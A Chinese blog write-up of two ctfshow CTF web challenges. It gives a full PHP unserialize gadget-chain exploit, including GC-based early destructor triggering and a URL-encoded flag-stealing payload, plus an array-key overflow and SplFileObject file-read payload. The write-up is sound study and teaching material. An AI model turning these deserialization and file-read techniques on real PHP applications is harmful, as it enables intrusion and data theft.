ctfshow卷王杯部分web

已于 2022-02-28 11:17:37 修改
阅读量5.3k 收藏 4
点赞数 4
分类专栏: WP 文章标签: 前端 php 安全
于 2022-02-27 20:49:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/not_code_god/article/details/123170171
版权

ctfshow卷王杯web部分[easy unserialize&easy web]

文章目录

easy unserialize

点击这里观看体验更佳
(经过大佬的指点,我在后面加了一种GC利用的新姿势在这个站里)

<?php
/**
 * @Author: F10wers_13eiCheng
 * @Date:   2022-02-01 11:25:02
 * @Last Modified by:   F10wers_13eiCheng
 * @Last Modified time: 2022-02-07 15:08:18
 */
include("./HappyYear.php");

class one {
    public $object;

    public function MeMeMe() {
        array_walk($this, function($fn, $prev){
            if ($fn[0] === "Happy_func" && $prev === "year_parm") {
                global $talk;
                echo "$talk"."</br>";
                global $flag;
                echo $flag;
            }
        });
    }

    public function __destruct() {
        @$this->object->add();
    }

    public function __toString() {
        return $this->object->string;
    }
}

class second {
    protected $filename;

    protected function addMe() {
        return "Wow you have sovled".$this->filename;
    }

    public function __call($func, $args) {
        call_user_func([$this, $func."Me"], $args);
    }
}

class third {
    private $string;

    public function __construct($string) {
        $this->string = $string;
    }

    public function __get($name) {
        $var = $this->$name;
        $var[$name]();
    }
}

if (isset($_GET["ctfshow"])) {
    $a=unserialize($_GET['ctfshow']);
    throw new Exception("高一新生报道");
} else {
    highlight_file(__FILE__);
}

这道题有幸拿到了二血,这道题做了之后学会了几个新姿势,我接下来分开来讲

  1. 了解__destruct()魔术函数的调用条件

__destruct()方法又叫析构函数,当程序结束销毁的时候自动调用,看下这道题中的代码

$a=unserialize($_GET['ctfshow']);
throw new Exception("高一新生报道");

这里有个throw函数,大概是抛出一个异常,然后让程序异常退出,这个时候就是未正常退出的情况,所以不会调用__destruct方法,这里我们就要想办法在throw函数执行之前调用析构函数,目前我知道的调用该函数的方法如下

  • 等待程序完整执行完毕,也就是解释完最后一行代码,这也是我们最常用的方法
  • 利用GC回收机制,比如
<?php
highlight_file(__FILE__);
class Demo{
        public function __destruct()
        {
                echo "Running method <destruct>";
        }
}
$a=new Demo();
// $a=null;
throw new Error("this is a test");

image-20220227190047954

然后我们把null赋值重新加上

image-20220227190130895

发现成功执行了__destruct函数,这也就是利用了GC回收机制让这个对象提前销毁,具体的GC回收机制可自行百度

那么这道题我们要怎么绕过呢,这里我们可以利用反序列化的性质来做,反序列化时从左到右的顺序进行重构的,所以我们只要构造出以下类似的结构就行

 a:2:{i:0;O:4:"Demo":0:{}i:0;N;}

这个payload可以由下面这个demo获取得到

<?php
highlight_file(__FILE__);
class Demo{
        public function __destruct()
        {
                echo "Running method <destruct>";
        }
}
$a=new Demo();
$b=null;
$c=array($a,$b);
echo serialize($c);

即定义一个数组,其中有两个值,第一个为实例化的对象,第二个为另外随便的一个值(这里赋null以外的值都可以),然后会得到``a:2:{i:0;O:4:"Demo":0:{}i:1;N;},将其改为 a:2:{i:0;O:4:"Demo":0:{}i:0;N;}也就是将第二个反序列化的序号改为0,这样就实现了对Demo这个对象的重新赋值,达到了提前是对象摧毁的效果

  • 最后一种就是利用unset()主动销毁,这里显然我们不能,所以忽略

现在算是过了第一关了,那我们开始审链子

  1. 不难发现我们最后是要调用one::MeMeMe,然后进入链子的起始点为one::destruct,顺着起始点往下跳

public function __destruct() {
        @$this->object->add();
}

这里调用了一个add的方法,由此可以跳到second::__call

进入second::__call:

此时调用了一个回调函数call_user_func([$this, $func."Me"], $args);分析一下他具体的调用结果,首先第一个参数[$this, $func."Me"]这是数组调用类方法的方式,其中$fun的值为访问的那个函数名,也就是add,所以总结下来其实就是访问second::addMe,然后再关注second::addMe

protected function addMe() {
        return "Wow you have sovled".$this->filename;
    }

这里将filename的成员变量与一个字符串相连接,很容易想到__toString方法,然后就不如到了one::__toString

public function __toString() {    return $this->object->string;  }

这里访问了string属性,可以想到__get,然后跳到third::__get

public function __get($name) {
        $var = $this->$name;
        $var[$name]();
    }

分析一下,变量var的值为 t h i s − > this-> this>name,也就是$this->string,然后调用一个方法,其中name的值不可控,var的值可以通过修改string的属性来控制,也就是说这里就能动态调用了

梳理一下链子如下

one::__destruct => second::__call => second::addMe => one::__toString => third::__get => one:MeMeMe

  1. 链子找到了,就要想办法实现,这里有个问题就是这里存在反复调用的问题,也就是one对象到second对象,然后有条回来,这样可能不能反复赋值,因为这样的话就进入死循环了,所以我们可以实例化两个one对象进入

具体的实现方式exp如下

<?php
highlight_file(__FILE__);
class one {
    public $object;
    public function __construct()
    {
        $this->object=new second();
    }
}

class second {
    public $filename;
}

class third {
    private $string;
}
$a=new one();
$b=new one();
$c=new second();
$d=new third("haha");
$b->object=$d;
$c->filename=$b;
$a->object=$c;
echo urlencode(serialize($a));

然后带入自己本地调试的文件中结果如下

image-20220227195432897

<?php
highlight_file(__FILE__);
class one {
        public $object;
    
        public function MeMeMe() {
                echo "<br>hahahaha";
            array_walk($this, function($fn, $prev){
                if ($fn[0] === "Happy_func" && $prev === "year_parm") {
                    global $talk;
                    echo "$talk"."</br>";
                    global $flag;
                    echo $flag;
                }
            });
        }
    
        public function __destruct() {
            @$this->object->add();
        }
    
        public function __toString() {
            echo "<br>Enter the tostring method";
            return $this->object->string;
            
        }
    }
    
    class second {
        protected $filename;
    
        protected function addMe() {
            echo "<br>addMe";
            return "Wow you have sovled".$this->filename;
            
        }
    
        public function __call($func, $args) {
            echo "<br>Enter the call method";
            call_user_func([$this, $func."Me"], $args);
            
        }
    }
    
    class third {
        private $string;
    
        public function __construct($string) {
            $this->string = $string;
        }
    
        public function __get($name) {
            echo "<br>Enter the get method!!!!!";
            $var = $this->$name;
            $var[$name]();
        }
    }
$a=unserialize($_GET['s']);

成功进入__get方法,如果我们只实例化一个one对象的话,可能就不能出现循环的问题了。另外这里我到一个php7的特性,使得绕过protect成员属性(对protect不敏感)

  1. 然后就是想办法进入到one::MeMeMe方法,然后拿到flag

终点看下这个函数

public function MeMeMe() {
            array_walk($this, function($fn, $prev){
                if ($fn[0] === "Happy_func" && $prev === "year_parm") {
                    global $talk;
                    echo "$talk"."</br>";
                    global $flag;
                    echo $flag;
                }
            });
        }

由于网上的关于array_walk的讲解大多数都是使用数组,所以我们可以写个demo来实验一下他对类的用法

<?php
highlight_file(__FILE__);
class Demo
{
    public $object="this is value";
    public function MeMeMe() {
        array_walk($this, function($fn, $prev){
            echo $fn."|".$prev;
        });
    }
}
$a=new Demo();
$a->MeMeMe();

image-20220227200313852

可以看到array_walk函数的作用就是遍历自定义函数,其中$fn的值为成员的值,prev为成员变量的名字,这里可以多设置几个成员属性来验证一下,我这里就偷懒没写,因为我之前已经写过了哈哈,也就是说我们要满足这个if条件就要添加一个如下的属性

image-20220227200808146

public $year_parm=array("Happy_func");
  1. 接下来就是想办法怎么在third::__get()里面怎么调用one::MeMeMe,最开始我想的是直接传入"one::MeMeMe",结果发现这样就不能自己设置成员属性了,所以这里我改用了另外一种方法,使用数组调用类方法,也就是传入这个payload
[new one(),"MeMeMe"]

然后再exp里面添加上上面成员属性就可以了,这里可以看到前面那个回调函数也使用了这一方法

  1. 最终exp
<?php
highlight_file(__FILE__);
class one {
    public $object;
    public $year_parm=array(0=>"Happy_func");
}

class second {
    public $filename;
}

class third {
    private $string;
    public function __construct()
    {
        $this->string=array("string"=>[new one(),"MeMeMe"]);
    }
}
$a=new one();
$b=new one();
$c=new second();
$d=new third("haha");
$b->object=$d;
$c->filename=$b;
$a->object=$c;
$n=null;
$payload=array($a,$n);
echo urlencode(serialize($payload));

image-20220227202258516

然后再修改一下得到payload

 a%3A2%3A%7Bi%3A0%3BO%3A3%3A%22one%22%3A2%3A%7Bs%3A6%3A%22object%22%3BO%3A6%3A%22second%22%3A1%3A%7Bs%3A8%3A%22filename%22%3BO%3A3%3A%22one%22%3A2%3A%7Bs%3A6%3A%22object%22%3BO%3A5%3A%22third%22%3A1%3A%7Bs%3A13%3A%22%00third%00string%22%3Ba%3A1%3A%7Bs%3A6%3A%22string%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A3%3A%22one%22%3A2%3A%7Bs%3A6%3A%22object%22%3BN%3Bs%3A9%3A%22year_parm%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22Happy_func%22%3B%7D%7Di%3A1%3Bs%3A6%3A%22MeMeMe%22%3B%7D%7D%7Ds%3A9%3A%22year_parm%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22Happy_func%22%3B%7D%7D%7Ds%3A9%3A%22year_parm%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22Happy_func%22%3B%7D%7Di%3A0%3BN%3B%7D

image-20220227202402417

easy web

php数组键溢出,php原生类操作文件

首先可以令c=9223372036854775806绕过第一层,然后根据提示使用glob://协议读取到flag文件名,最后使用SplObjectFile类读取文件

image-20220227203017926

其中获取文件名的时候可以爆破md5值得第一位数

payload如下

c=9223372036854775806&a=SplFileObject&b=flag56ea8b83122449e814e0fd7bfb5f220a.php

image-20220227203224687

Pysnow
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFshow-王杯-简单的re(复现)
ookami6497的博客
03-19 1196
普通的upx壳,放kali里面脱下壳就行 运行 进入主函数 __int64 sub_401165() { int v0; // edx int v1; // ecx int v2; // er8 int v3; // er9 __int64 result; // rax __int64 v5; // [rsp+8h] [rbp-1018h] char v6[112]; // [rsp+10h] [rbp-1010h] BYREF int v7; // [rs..
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
ctfshow-王杯
blowed的博客
02-28 784
ctfshow-王杯web
2024年网络安全最新ctfshow王杯——easy unserialize_王杯 easy unseriliz
最新发布
2401_84281738的博客
05-01 22
__toString():$this->object->string -> 读取不可访问属性触发get()this->object->add() ->调用一个不存在的方法触发call()this, $func.“Me”], $args) ->调用addMe()throw new Exception(“高一新生报道”);this->filename ->触发toString()name]() ->调用one:MeMeMe()
CTFshow-网杯-crypto-真·简单·不·现代密码签到(复现)
ookami6497的博客
03-06 843
from Crypto.Util.number import bytes_to_long from secrets import p,q,r,s,t,flag n = p * q * r * s * t e = 2 m = bytes_to_long(os.urandom(500) + flag) c = pow(m,e,n) print(p,q,r,s,t,sep='\n') print(c) ''' 145332367700944303747548912160113939198078051436.
ctfshow王杯——easy unserialize
qq_45766062的博客
03-14 1057
题目源码 <?php /** * @Author: F10wers_13eiCheng * @Date: 2022-02-01 11:25:02 * @Last Modified by: F10wers_13eiCheng * @Last Modified time: 2022-02-07 15:08:18 */ include("./HappyYear.php"); class one { public $object; public function MeMe
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
2020第十三届全国大学生信息安全竞赛大部分题目
08-22
除了pwn类题和web的easy_unserialize全都有
CTFSHOW[王杯](上)
errorr0
03-19 2925
ctfshow王杯
ctfshow王杯
as you know, nlp is fantasitc!
03-05 562
ctfshow王杯 写在前面:这次的做出一道php题,通过这次的比赛,深入理解反序列化漏洞,通过复现学到了很多新的点 参考一篇特别详细的wp eazy unserialize(复现) 源码 <?php include("./HappyYear.php"); class one { public $object; public function MeMeMe() { array_walk($this, function($fn, $prev){
王杯easy unserialize
……
01-13 131
王杯web easy unserialize
2022/03/14ctfshow王杯easy unserialize
A的博客
03-14 375
public function MeMeMe() { array_walk($this, function($fn, $prev){ if ($fn[0] === "Happy_func" && $prev === "year_parm") { global $talk; echo "$talk"."</br>"; global $flag; echo $fla
CTFshow单身杯 部分wp
Nancy523的博客
05-22 1990
前言:不会吧不会吧不会有人520521不约会打比赛吧 文章目录1、单身杯热身题目2、misc签到3、没大没小的串串4、任性老板5、蛤壳雪茄-16、蛤壳雪茄-27、The Dancing Men8、伪装成RSA的MUSC9、re签到10、magic 1、单身杯热身题目 应该是后台做了日期相关的验证,反正照常输一个日期不要太离谱的就哦了 2、misc签到 题目提示: 下载附件,ARCHPR爆破所有可打印字符,位数为5位,得到压缩包密码61f@X 010editor打开解压得到的图片可以找到 base6.
2022-王杯-happyFastjson
feng的博客
03-02 1775
2022-王杯-happyFastjson 前言 昨天看了fastjson,因为最近比赛的fastjson出现的有点多。王杯Y4出了道fastjson的题目,考点是比较基础的东西,学习一波。 分析 import java.io.ByteArrayOutputStream; import java.io.InputStream; import java.util.HashMap; import java.util.Map; public class FlagBean { private int
ctfshow(王杯)
qq_62046696的博客
09-24 1463
首先我们的前提是if(isset($_POST['a']) && isset($_POST['b']) && isset($_POST['c']))} 这里的name就是上面的string传进来的,但是 $var = $this->$name;array_walk函数的作用就是遍历自定义函数,其中$fn的值为成员的值,prev为成员变量的名字。这是个等于号,相当于赋值,而对于数组无法赋值的情况就是当键溢出就行,可以看到上一句有。如果是数组的话,第一个是类,第二个是方法,第三个是属性。
ctfshow菜狗杯web
09-07
ctfshow菜狗杯web是一个CTF比赛中的一个项目,其中包含了多个题目和挑战。其中有一个题目叫做"web2 c0me_t0_s1gn",这是一个需要进行签到的题目。 在这个题目中,源码中没有对number2进行正则匹配校验,所以number2是沙箱逃逸的入手点。 在解题过程中,可以通过传入cookie中的CTFshow-QQ群:=a,然后通过$_GET['b']和$_REQUEST['c']的方式获取到需要的值。最终可以通过传入一个数组给到eval来执行代码。 总的来说,ctfshow菜狗杯web是一个CTF比赛中的项目,其中包含了多个题目和挑战,其中一个题目是"web2 c0me_t0_s1gn",解题过程中需要利用沙箱逃逸和通过传入参数来执行代码。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pysnow

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值